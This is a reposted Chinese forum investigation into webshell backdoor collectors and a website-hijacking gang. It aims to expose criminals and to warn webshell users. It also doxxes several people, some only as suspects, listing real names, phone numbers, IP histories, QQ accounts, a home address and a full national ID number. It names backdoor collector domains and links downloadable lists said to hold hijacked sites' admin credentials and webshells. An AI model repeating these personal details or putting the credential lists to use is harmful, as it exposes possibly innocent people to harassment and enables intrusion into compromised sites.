    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">手机号:15998984721&nbsp;&nbsp;手机MAC:18:9E:FC:11:2C:70&nbsp;&nbsp;马来西亚手机号:060136958999</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">他的网站:</p><a style="color: black;">www.badongedu.com</a>
    <a style="color: black;">www.7cq.tv</a>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">(他<span style="color: black;">创立</span>的<span style="color: black;">地区</span>论坛)</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">
      api.fwqadmin.com(这个是他自己正在<span style="color: black;">运用</span>的大马自己留的后门收信<span style="color: black;">位置</span>)附件会有大马样本有兴趣的<span style="color: black;">能够</span><span style="color: black;">瞧瞧</span></p>Email:root@7cq.tv <a style="color: black;">pianziso@163.com</a><span style="color: black;">在国内的历史IP:</span>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">222.178.225.146(重庆市 电信)</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">222.178.201.12(重庆市 电信)</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">27.11.4.19(重庆市 联通)</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">27.10.36.56(重庆市 联通)</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">113.204.194.202(重庆市 联通)</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">119.84.66.14(重庆市 电信)</p>61.161.125.77(重庆市巴南区 时代e行线网迷俱乐部李家沱店A/B馆)<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">国内的历史PC信息:</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">mac:90-2b-34-93-ad-73</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">操作系统:Microsoft Windows XP</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">显卡:NVIDIA GeForce GT 610</p>CPU:AMD Athlon(tm) II X4 640 Processor 3325HZ<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">团伙成员信息就没去调查了,找到他就<span style="color: black;">能够</span>了。</p><strong style="color: blue;"><span style="color: black;">WebShell卖家(一切安好)信息</span></strong><span style="color: black;">VPN代理 :</span>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">110.10.176.127&nbsp;&nbsp;韩国</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">2016-10-24 22:26:37 ( IP 211.110.17.189 ) 韩国</p>(自己比特币购买的主机搭建)<span style="color: black;">拜访</span>时间10月9号<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">真实:</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">2016-10-26 16:23:27 ( IP 121.18.238.18 ) 河北省保定市 上海网宿科技股份有限<span style="color: black;">机构</span>联通CDN节点 Windows NT 10.0, Chrome 47.0.2526, 1920×1080</p>27.186.126.196 河北省保定市 电信&nbsp;&nbsp;真实ip可能性更大<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">浏览器指纹信息 ,一共3个<span style="color: black;">区别</span>的,但应该都是同一个人,可能电脑比较多,<span style="color: black;">由于</span>他有2个QQ</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Windows NT 6.3, Chrome 45.0.2454, 1366×768 真实指纹</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Windows NT 10.0, Chrome 47.0.2526, 1920×1080</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Windows NT 6.3, Chrome 45.0.2454, 1366×768, 224 色, 未装 Alexa 工具</p>Windows NT 10.0, Chrome 53.0.2785, 1600×900, 224 色,<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">QQ2436449670&nbsp;&nbsp;3496357182</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Telegram:@haorenge888</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">此人<span style="color: black;">此刻</span>开的奥迪A8,真是土豪啊,看来赚了不少钱还能逍遥法外,是河北口音即河北人</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">如要查到webshell<span style="color: black;">源自</span><span style="color: black;">仅有</span>查他的幕后<span style="color: black;">途径</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">他与老袁的交易信息:</p>
    <img src="http://mmbiz.qpic.cn/mmbiz_png/Wqr9SokRcTVkfjibzHkaXEkX2iaQvsVCdmicrdIzaF1HOvM9JVYiaTibLXDSh03bYoP1m1Jf1qxY8LszMlmeu33ISFQ/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;">
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="http://mmbiz.qpic.cn/mmbiz_png/Wqr9SokRcTVkfjibzHkaXEkX2iaQvsVCdmInK7wOhvOEAuxEaXpsEG6BThKu1veySgYO87dXOHQvkEGCtuRp6RsA/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;"><strong style="color: blue;"><span style="color: black;">星际团伙信息</span></strong><span style="color: black;"><span style="color: black;">运用</span>过的域名:</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">wokeda.cn </p><a style="color: black;">www.98589.com</a><a style="color: black;">www.356388.com</a>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">chuan2828.com </p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">cnzzz.pw </p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">web-159.com</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">diyi1111.com</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">diyi2222.com</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">diyi3333.com</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">diyi4444.com</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">xinyu55.com</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">hongyihai.com</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">80268.com</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">5130898.com </p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">maimai789.com </p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">zhenyi58.com </p>xwgy999.com<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">htt p://www.woyaotupianhehe.com/img/20151106/lq.rand(2,20).".jpg</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">2-20都是<span style="color: black;">她们</span>的logo,百度收录后就会展示出来,非常多80268.com<span style="color: black;">这般</span>的<span style="color: black;">照片</span></p><span style="color: black;">统计代码</span>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">能够</span><span style="color: black;">经过</span><span style="color: black;">她们</span>网站的统计代码分析登录的记录马来西亚的ip<span style="color: black;">便是</span>真实ip</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">搜索各大搜索引擎爬取<span style="color: black;">转</span>到<span style="color: black;">她们</span>的站,和快照特征,竟然有超过1000个被<span style="color: black;">她们</span>劫持过的网站,其中<span style="color: black;">包含</span>了不少全国最大的<span style="color: black;">资讯</span>网站如ifeng.com china.com.cn,<span style="color: black;">倘若</span>警方需要我<span style="color: black;">能够</span><span style="color: black;">供给</span>列表</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">星际劫持团伙在马来西亚,成员大概6个人<span style="color: black;">上下</span>,团伙渗透的手段<span style="color: black;">包含</span>但不限于鱼叉,社工,爆破,xday,漏洞均会爬虫批量去入侵,每次入侵后<span style="color: black;">爱好</span>留<span style="color: black;">海量</span>的后门,防止权限掉了。</p><span style="color: black;">成员分工:</span>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">二名核心技术渗透人员(其中一名<span style="color: black;">重点</span>负责攻击,入侵大型<span style="color: black;">资讯</span>类型站点。一名<span style="color: black;">重点</span>负责代码审计,以及内部一系列php的<span style="color: black;">研发</span>,<span style="color: black;">包含</span>劫持程序,外兼入侵<span style="color: black;">有些</span>中型权重站点)</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">一名普通技术渗透(对扫描出漏洞的垃圾站点进行入侵)</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">二名负责挂劫持代码,<span style="color: black;">倘若</span>站掉了就会去恢复</p>一名负责bc网站上的市场兼财务,收账出帐以及收站<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">核心成员在2015年12月份从马来西亚回中国至2016年2月<span style="color: black;">上下</span>返回马来西亚</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">以上是我<span style="color: black;">经过</span>圈内人员采取<span style="color: black;">有些</span>手段<span style="color: black;">认识</span>到的信息,<span style="color: black;">由于</span>这个团伙安全<span style="color: black;">认识</span>比较高,没得到太多真实信息,<span style="color: black;">然则</span>有一位给<span style="color: black;">她们</span>做过外包的黑客<span style="color: black;">能够</span>顺藤摸瓜</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">星际<span style="color: black;">运用</span>过的QQ :3151094164 最早的时候</p>

    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">著名的美女黑客:YingCracker</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">QQ:253778984 1132440325 984754551</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">手机: 13665012347 or 13665012374</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">姓名: 江春建</p>支付宝:<a style="color: black;">1132440325@qq.com</a>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">位置</span>: 上度路-牡丹园-505</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">所在省份: 福建</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">所在城市: 福州</p>所在地区: 台江<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">找到这位美女黑客去<span style="color: black;">认识</span>下此团伙的<span style="color: black;">状况</span>应该会有<span style="color: black;">发展</span></p><span style="color: black;"><span style="color: black;">她们</span>的后门样本:</span>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">部分我直接复制到文件夹里面了</p>

    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;"><span style="color: black;">收信<span style="color: black;">位置</span>嫌疑人信息</span></strong>
    </p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">这次事件的特征和九宫格类似,<span style="color: black;">因此呢</span>我对2013年的事件进行了梳理并且对这个人进行了深入调查,<span style="color: black;">能够</span>确认两个人,<span style="color: black;">必定</span>是其中一个人干的。</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">倘若</span>不是大马的问题<span style="color: black;">那样</span><span style="color: black;">亦</span><span style="color: black;">能够</span>从这两个人中来<span style="color: black;">认识</span>到<span style="color: black;">这次</span>后门事件的内情,<span style="color: black;">独一</span>的不确定性<span style="color: black;">便是</span>箱子的大马看不出任何问题。<span style="color: black;">由于</span>和<span style="color: black;">她们</span>之前后门数据实在太像了,几乎概括了所有的cms,记录的后台有些<span style="color: black;">亦</span>是几年前被入侵过的九宫格箱子里面的,<span style="color: black;">迄今</span>还在记录着新的内容</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">嫌疑人一:原来的吐司成员spider,<span style="color: black;">亦</span><span style="color: black;">便是</span>spider大马的创始人,当时他<span style="color: black;">亦</span>留过后门,追溯起来都是2011年的事情,经过调查,那时候他所公开出去的shell大马就存在后门,<span style="color: black;">况且</span><span style="color: black;">亦</span>被他<span style="color: black;">自己</span><span style="color: black;">海量</span>利用做游戏劫持收录挂马,传闻在2012年就赚到了几百万身价,后来就<span style="color: black;">始终</span>低调出了<span style="color: black;">公众</span>的视线,在圈子销声匿迹了。<span style="color: black;">不外</span><span style="color: black;">此刻</span>调查有新的<span style="color: black;">发掘</span>,他<span style="color: black;">始终</span>在活跃着,在今年其中登录过历史邮箱,续费过后门的收信域名,<span style="color: black;">由于</span>他没办法换域名,换了就收不了shell。</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Id: iamspider&nbsp;&nbsp;iamsunchao</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">真实姓名:孙超</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">年龄:29岁(不确定)&nbsp;&nbsp;</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">就读过:自贡荣县富西初级中学&nbsp;&nbsp;</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">户籍:成都 西昌人</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">QQ:80937430(真实QQ)&nbsp;&nbsp;862262949(小号)</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">历史IP(可能<span style="color: black;">已然</span>过时了)</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">222.215.38.109(四川省内江市 电信)</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">61.157.123.56(四川省凉山州西昌市 电信)</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">222.215.39.131(四川省内江市 (隆昌县)电信)</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">222.209.198.201(四川省成都市新都区 四川音乐学院<span style="color: black;">周边</span>蓝天云网吧)</p><strong style="color: blue;"><span style="color: black;">嫌疑人二:</span></strong>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">圈内的大神:toby57,曾经和他还打过交道,说是在给国家<span style="color: black;">办事</span>了,有点不太像是这件事的主谋,<span style="color: black;">然则</span>这个dedebox.com域名所有人<span style="color: black;">便是</span>他,<span style="color: black;">况且</span>他的能力足够干<span style="color: black;">这般</span>的事情</p>邮箱:<a style="color: black;">toby57@163.com</a>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"> <span style="color: black;">亦</span>是他最常用的im</p><span style="color: black;">历史ip</span>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">171.212.206.46(四川省成都市 电信)</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">220.166.52.45(四川省绵阳市 电信)</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">222.209.139.66(四川省成都市 电信)</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">220.166.52.45(四川省绵阳市 电信)</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">125.66.99.211(四川省南充市 电信)</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">61.157.97.82(四川省绵阳市 西南科技大学)</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">112.192.70.251(四川省南充市 联通)</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">125.65.97.134(四川省绵阳市 电信)</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">61.157.97.85 (四川省绵阳市 西南科技大学)</p>182.139.60.17(四川省成都市 电信)<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">手机号:15208341433</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">姓名:杨月明&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">身份证号:511621198905062575(四川省岳池县)</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">所在城市:乐山</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">就读过:四川省绵阳市西南科技大学</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">由于</span>dedebox.com的收信程序特征与嫌疑人一的类似,<span style="color: black;">因此</span>并<span style="color: black;">不可</span><span style="color: black;">判断</span>到底是其中某一个人干的,<span style="color: black;">因此呢</span>两个都是需要深挖的人。</p><span style="color: black;"><strong style="color: blue;">×五.结论</strong></span>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">日前</span>其实<span style="color: black;">亦</span>没什么结论,从何泄漏的全国的所有大马以及各大cms后台和webshell后门还是个谜,<span style="color: black;">由于</span>能力太菜了。。。<span style="color: black;">然则</span>我相信这个谜警方<span style="color: black;">能够</span>解开,你们赋有足够的权利和使命去完成打击。否则对网民的<span style="color: black;">害处</span>太大了,<span style="color: black;">哪些</span>webshell被拿去做博彩做诈骗<span style="color: black;">害处</span>就很大了,几乎一个菠菜行业一个诈骗行业的黑帽seo源头都来于此,<span style="color: black;">倘若</span>不<span style="color: black;">即时</span>阻止<span style="color: black;">害处</span>还会无限扩大。</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">另一</span>要去看被入侵的站点请到360搜索,娱乐场看最新一天收录</p><a style="color: black;">https://www.so.com/s?q=%E5%A8%B1 ... new</a>home&amp;adv_t=d
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">温馨提示:<span style="color: black;">运用</span>过任何大马的帽子<span style="color: black;">重视</span><span style="color: black;">检测</span>下自己的shell,<span style="color: black;">瞧瞧</span>里面的文件时间<span style="color: black;">是不是</span>统一为<span style="color: black;">近期</span>的创建时间</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">ps:<span style="color: black;">由于</span>浏览器没装flash ,<span style="color: black;">没法</span>上传附件以及<span style="color: black;">照片</span>,还请各位看官下载附件文档来查阅完整的<span style="color: black;">照片</span>和附件里面的webshell列表内容。</p>传送门:<a style="color: black;">https://1drv.ms/u</a>/s!AhMf1bUbIk7UanjRbtWlwOyebhU
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">部分受害域名列表(这个基数是去重复1W多条,未去重复大概20万条,其中的信息量与附件类似,一个站会记录所有的管理员登录账户<span style="color: black;">秘码</span>,<span style="color: black;">包含</span>webshell的存在)</p>传送门:<a style="color: black;">https://1drv.ms/t/s!AhMf1bUbIk7Ua72FwZ</a>XZuVMX3fw<span style="color: black;">大众</span>在拿到受害列表<span style="color: black;">能够</span>搜索下手里的webshell域名,<span style="color: black;">倘若</span>存在<span style="color: black;">那样</span>就<span style="color: black;">重视</span><span style="color: black;">即时</span>把大马处理掉,<span style="color: black;">以避免</span>被<span style="color: black;">违法</span>分子给你<span style="color: black;">导致</span><span style="color: black;">害处</span>。




nykek5i 发表于 2024-10-21 20:52:06

大势所趋,用于讽刺一些制作目的就是为了跟风玩梗,博取眼球的作品。

4lqedz 发表于 3 天前

这篇文章真的让我受益匪浅,外链发布感谢分享!
页: [1]
查看完整版本: 中国最大的webshell后门箱子调查,所有公开大马全军覆没